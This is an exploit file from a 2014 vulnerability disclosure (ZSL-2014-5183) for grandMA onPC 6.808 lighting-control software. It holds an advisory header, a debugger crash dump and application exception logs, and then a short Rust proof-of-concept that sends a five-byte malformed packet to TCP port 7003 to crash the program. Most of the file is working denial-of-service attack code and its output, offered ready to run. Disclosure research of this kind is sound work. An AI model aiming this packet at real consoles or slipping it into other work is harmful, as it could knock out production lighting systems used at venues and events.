/* MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit Vendor: MA Lighting Technology GmbH Product web page: http://www.malighting.com Affected version: grandMA series 1 onPC Software 6.808 (6.801) Summary: The grandMA onPC software incorporates all functions of a grandMA console and offers you its full potential on your notebook or PC. You can use grandMA onPC for running, programming or offline pre-programming, as well as a smart backup solution within the grandMA system. With the MA onPC command wing and MA onPC fader wing MA Lighting has developed a sophisticated hardware extension perfectly suited for the grandMA onPC software. Desc: grandMA onPC version 6.808 is exposed to a remote denial of service issue when processing socket connection negotiation. This issue occurs when the application handles a single malformed packet over TCP port 7003, resulting in a crash. =========================================================================== (1324.be4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 ntdll!RtlEnterCriticalSection+0x12: 77ce22c2 f00fba3000 lock btr dword ptr [eax],0 ds:002b:3535393f=???????? -- 303.640 GMA : RR NEW STATION IN NETWORK 127.0.0.1(100) AS Standalone 367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1 367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY ! 367.180 CC : ******* EXCEPTION ************************** 367.180 CC : * ACCESS_VIOLATION 367.180 CC : * EAX = 37363341 EBX = 6D856B0 367.180 CC : * ECX = 37363339 EDX = B78F41C 367.180 CC : * ESI = 37363341 EDI = 3736333D 367.180 CC : * DESKTYP : GMA [Windows] 367.180 CC : * VERSION : 6.808 STREAMING : 6801 367.180 CC : ******************************************** 367.240 CC : 0x775522c2 RtlEnterCriticalSection() + 0x12 =========================================================================== Tested on: Microsoft Windows 7 Professional SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5183 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php 31.03.2014 */ use std::io::net::ip::SocketAddr; use std::io::net::tcp::TcpStream; fn bann() { println!(" +======================================+ | grandMA onPC 6.808 Denial of Service | |--------------------------------------| | | | ID: ZSL-2014-5183 | +======================================+ "); } fn main() { bann(); println!("\n[*] Sending packet to local host on tcp port 7003\n"); let addr = from_str::("127.0.0.1:7003").unwrap(); let mut socket = TcpStream::connect(addr).unwrap(); socket.write(bytes!("\x74\x30\x30\x74\x21")); println!("[*] Crashed!\n"); }